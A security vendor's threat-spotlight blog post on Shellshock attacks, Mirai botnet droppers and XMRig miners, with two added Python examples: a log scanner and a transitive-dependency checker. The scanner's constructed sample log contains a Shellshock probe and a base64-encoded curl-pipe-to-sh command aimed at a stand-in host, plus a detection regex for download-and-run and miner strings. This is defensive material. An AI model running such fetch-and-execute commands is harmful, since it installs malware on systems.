https://blog.barracuda.com/2024/03/06/threat-spotlight-shellshock-bugs-miners
THREAT SPOTLIGHT: WEB APPS UNDER ACTIVE THREAT FROM 10-YEAR-OLD SHELLSHOCK BUGS AND MINERS

Mar. 6, 2024 | Tushar Richabadas

The Shellshock bugs — there are six related CVE designations — have the highest severity rating of 10. They exist in the Unix Bash shell, which is the default command-line interface on all Linux, Unix, and Mac-based operating systems. If successfully exploited, Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many internet-facing services, such as web servers, that use Bash to process requests.

VULNERABLE SOFTWARE UNDER ACTIVE ATTACK

The top three vulnerabilities currently being targeted with Shellshock attacks are in the chart below. They highlight how vulnerabilities can lurk for years undetected in the software supply chain. A device could be running the latest version of its firmware and still be vulnerable, because the people creating that software did not update the libraries in their supply chain.

CVE-2019-7481 is a 7.5-rated SQL injection vulnerability in a security service for which a patch exists. CVE-2021-42071 is a critical 9.8-rated vulnerability in a visual tool application that could allow an unauthenticated attacker to achieve remote command execution.

INSTALLING MIRAI BOTNET VARIANTS

CVE-2019-7481 has been targeted since at least 2021 by attackers trying to install Mirai botnet variants. The Mirai botnet comprises a vast number of hacked connected (IoT) devices and is used predominantly to launch DDoS attacks. Since Mirai first came to the forefront in August 2016, researchers have seen multiple variants appear on the threat landscape. Mirai primarily targets Linux-based IoT devices.
Most of the attacks start by downloading a shell script that then downloads several platform-specific malware binaries and attempts to run them. Once infected, the device becomes part of the growing botnet.

The first two Mirai variants that we saw in our logs were going after the LuCI web interface for OpenWRT-based routers. This is a management interface that should not be exposed to the internet. Unfortunately, it often is, and attackers use this to their advantage.

The first variant was used by attackers trying to execute a shell script named “sorry.sh”. This script is no longer available. According to URLhaus, it has been reported and taken down. However, the analysis on URLhaus makes it clear that this is part of a Mirai/Gafgyt infestation attempt. A more detailed description is available on VirusTotal.

The second variant is still active. The attackers using this variant delete everything in the root directory and then download a shell script into /tmp. When executed, the shell script downloads several platform-specific binaries and then executes them in order. The developer of this specific script appears to have a sense of humor: the downloaded files are renamed using an escalating series of insults (duly censored in the screenshot).

A different Mirai/Gafgyt variant was targeting a remote command execution vulnerability in Zyxel routers. The URLhaus entry shows that this was also a Mirai “infector” (huhu.mips) — though it is now offline. Looking at the entry for the IP address, it is currently serving the malware under a new name (skyljne.mips).

CRYPTOMINER INFECTIONS TARGETING VULNERABILITIES

In addition to Shellshock, we have seen attackers targeting vulnerabilities to install cryptominers. Back in 2022, we saw cryptominers attempting to exploit the then-new Atlassian Confluence vulnerability. In February 2024, we are seeing active attempts to exploit years-old ThinkPHP vulnerabilities and install XMRig miners.
The first URL we saw was:

Decoding the partial base64, we find the following command:

This shows up on ANY.RUN as the XMRig miner. At the time of writing this blog, the miner is still online.

Another example of this is:

This decodes to:

An analysis of this shell script on ANY.RUN shows that it downloads the redtail binary as well.

A third example of this is the same 45.x IP serving a different script:

This decodes to:

Per VirusTotal, this is likely a miner too.

A final example of the miner is this one:

This decodes to:

The name of the miner in this case is not obfuscated and is directly identifiable as XMRig. It is currently offline.

All the miner examples are targeting older ThinkPHP vulnerabilities — remote code execution (RCE) vulnerabilities from 2018 and 2020 that should rightfully be patched by now.

KEEPING YOUR APPLICATIONS SECURE

These types of attacks come and go in waves, with each wave — both for Mirai and for cryptominers — targeting specific vulnerabilities in campaigns. Around 10 years ago, attackers mainly looked for and used newer vulnerabilities such as zero days to try to get into the network. This has shifted to attackers working smarter, not harder. They have caught on to the fact that software supply chains are rarely fully secure, and they are using older but still unpatched vulnerabilities to their advantage.

The software supply chain security issue is quite difficult to solve — you could deploy the latest version of your file transfer software, but under the hood that software might be using a vulnerable version of Log4J. You assume your application is secure, but in fact it has a known vulnerability. The only way to find this out is to run regular vulnerability scans. In the case of Log4J, you are likely doing this already. But what happens if the vulnerability is in a relatively unknown library that is only used in this one piece of software? The old defense-in-depth advice remains relevant.
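Both the Shellshock probes described at the top of the post and the base64-wrapped miner commands in this section leave a footprint in ordinary web server access logs. The scanner below is an added example for this page, not Barracuda's tooling and not code from the post. It assumes Apache/Nginx combined log format and uses three constructed log lines (documentation IP ranges, an example.invalid host, a harmless echo after the Shellshock marker). It flags (a) the Bash function-definition marker `() {` in any request field a CGI server would export to the environment, and (b) query-string values that decode, even after losing their `=` padding (the "partial base64" the post mentions), to a download-and-run command or a known miner name.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Combined log format: client, ident, user, timestamp, request line, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Bash function-definition prefix in an HTTP field: the Shellshock marker that an IDS signature keys on.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Runs of base64 alphabet long enough to be worth decoding; shorter runs are mostly ordinary words.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Download-and-execute behaviour the post describes: fetch a script, pipe it to a shell,
# stage in /tmp, or name a known miner (XMRig, redtail).
DOWNLOADER_RE = re.compile(r"\bwget\b|\bcurl\b|\|\s*(?:ba)?sh\b|chmod\s+\+x|/tmp/|xmrig|redtail", re.I)


def decode_partial_base64(token):
    """Decode a base64 fragment whose '=' padding may have been dropped; None if it is not printable text."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    return text if all(c.isprintable() or c.isspace() for c in text) else None


def scan_line(line):
    """Return a list of finding dicts for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return [{"ip": None, "indicator": "unparsed-line", "field": None, "detail": line[:80]}]
    f = m.groupdict()
    findings = []
    # (a) Shellshock marker in any field a CGI server would copy into Bash's environment.
    for field in ("target", "referer", "ua"):
        if SHELLSHOCK_RE.search(f[field]):
            findings.append({"ip": f["ip"], "indicator": "shellshock-marker",
                             "field": field, "detail": f[field][:80]})
    # (b) base64 blobs in query values that decode to a download-and-run command.
    for key, value in parse_qsl(urlsplit(f["target"]).query, keep_blank_values=True):
        # parse_qsl turns a literal '+' into a space; restore it in a second candidate so
        # unencoded base64 containing '+' still decodes.
        tokens = set()
        for candidate in {value, value.replace(" ", "+")}:
            tokens.update(B64_RE.findall(candidate))
        for token in sorted(tokens):
            decoded = decode_partial_base64(token)
            if decoded and DOWNLOADER_RE.search(decoded):
                findings.append({"ip": f["ip"], "indicator": "encoded-downloader",
                                 "field": key, "detail": decoded})
    return findings


def scan_log(text):
    return [hit for line in text.splitlines() if line.strip() for hit in scan_line(line)]


def _b64_query_value(cmd, keep_padding=True):
    """Encode a command the way it would appear in a request: base64, then percent-encoded."""
    b64 = base64.b64encode(cmd.encode()).decode()
    return quote(b64 if keep_padding else b64.rstrip("="), safe="")


# Constructed sample: example.invalid never resolves, and the Shellshock line only echoes a word.
MINER_CMD = "curl -s http://example.invalid/m.sh | sh"
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [06/Mar/2024:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo probe"',
    '203.0.113.8 - - [06/Mar/2024:10:01:05 +0000] "GET /index.php?s=index&cmd='
    + _b64_query_value(MINER_CMD, keep_padding=False) + ' HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [06/Mar/2024:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
])

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]}  {hit["indicator"]:<20} {hit["field"]}: {hit["detail"]}')
```

The base64 heuristic is deliberately loose (any 16-character alphabet run is tried), so it relies on the decoded text also matching the downloader patterns before raising a finding; long opaque tokens such as session ids decode to unprintable bytes and are dropped by `decode_partial_base64`. Feed real logs through `scan_log` and review `unparsed-line` hits first, since a log format other than combined will show up there rather than as missed attacks.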
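The supply-chain point above (a current application quietly shipping a vulnerable library two levels down its dependency tree) is what a transitive dependency check is for. The following is an added example for this page, not a Barracuda tool or code from the post. It assumes a dependency listing in the indented style of `mvn dependency:tree`; both the tree and the advisory entries are constructed, with placeholder advisory ids and illustrative version ranges rather than real CVE data.

```python
import re

# Constructed advisory entries: placeholder ids and illustrative ranges, not a real feed.
ADVISORIES = [
    {"id": "ADV-PLACEHOLDER-001", "package": "org.apache.logging.log4j:log4j-core",
     "introduced": "2.0", "fixed": "2.15.0"},
    {"id": "ADV-PLACEHOLDER-002", "package": "com.example:obscure-lib",
     "introduced": "1.0", "fixed": "1.4.2"},
]

# Constructed tree: the application itself is current; the affected libraries sit one and two levels down.
DEP_TREE = """\
com.example:file-transfer:jar:5.2.0
+- org.springframework:spring-core:jar:5.3.20:compile
+- com.example:obscure-lib:jar:1.4.1:compile
|  \\- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
\\- org.apache.commons:commons-lang3:jar:3.12.0:compile
"""

# Tree-drawing prefix, then group:artifact:type:version[:scope]; depth is the prefix width divided by 3.
LINE_RE = re.compile(
    r"^(?P<prefix>[ |+\\-]*)"
    r"(?P<group>[\w.\-]+):(?P<artifact>[\w.\-]+):(?P<type>\w+):(?P<version>[\w.\-]+)"
    r"(?::(?P<scope>\w+))?\s*$"
)


def version_key(v):
    """Sortable key: dotted numeric part padded to four fields, then release (1) above pre-release (0)."""
    main, _, qualifier = v.partition("-")
    nums = tuple(int(p) if p.isdigit() else 0 for p in main.split("."))
    nums = nums + (0,) * (4 - len(nums))
    return (nums, 0 if qualifier else 1, qualifier)


def is_affected(version, adv):
    """Half-open range [introduced, fixed): the fixed version itself is clean."""
    return version_key(adv["introduced"]) <= version_key(version) < version_key(adv["fixed"])


def parse_tree(text):
    """Yield (depth, node dict) for every line of the tree; reject lines that do not look like a coordinate."""
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised tree line: {line!r}")
        yield len(m.group("prefix")) // 3, m.groupdict()


def find_vulnerable(tree_text, advisories):
    """Walk the tree depth-first and report every node in an affected range with its path from the root."""
    by_package = {}
    for adv in advisories:
        by_package.setdefault(adv["package"], []).append(adv)
    stack = []   # artifact names from the root down to the current node
    hits = []
    for depth, node in parse_tree(tree_text):
        del stack[depth:]
        stack.append(node["artifact"])
        package = f'{node["group"]}:{node["artifact"]}'
        for adv in by_package.get(package, []):
            if is_affected(node["version"], adv):
                hits.append({"package": package, "version": node["version"],
                             "advisory": adv["id"], "path": list(stack)})
    return hits


if __name__ == "__main__":
    for hit in find_vulnerable(DEP_TREE, ADVISORIES):
        print(f'{hit["advisory"]}: {hit["package"]} {hit["version"]} via {" -> ".join(hit["path"])}')
```

The path is the useful part of each finding: the application's own version number tells you nothing, but "file-transfer -> obscure-lib -> log4j-core" tells you which direct dependency has to be bumped or overridden. Version comparison here is a simple numeric-then-qualifier key; real ecosystems (Maven, npm, PyPI) each have their own ordering rules, so a production scanner should use the ecosystem's comparator rather than this one.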
Having a defensive “onion” for your network and applications is crucial to preventing attacks before they can reach your application. This approach will also give you time and air cover when you have not yet been able to patch a new zero day.

Protection against DDoS also remains critical. Attackers are using years-old vulnerabilities to create their botnets and perform newer types of DDoS attacks such as HTTP/2 Rapid Reset. Having a solution in place that can stop both older volumetric DDoS attacks and newer, subtler application DDoS attacks is critical for business continuity.

If you look at the vulnerabilities mentioned above and in our recent application security Threat Spotlight, you see that when it comes to applications, the software supply chain is a weak link that needs and deserves a significant protective layer.

Tushar Richabadas is Senior Product Marketing Manager, Applications and Cloud Security, Barracuda. Prior to this role, Tushar was a Product Manager for the Barracuda Web Application Firewall and Barracuda Load Balancer ADC, with a focus on cloud and automation. Tushar has a wide range of experience, from leading networking product testing teams to technical marketing for HCL-Cisco. Tushar closely tracks the rapidly increasing impact of digital security and is passionate about simplifying digital security for everyone.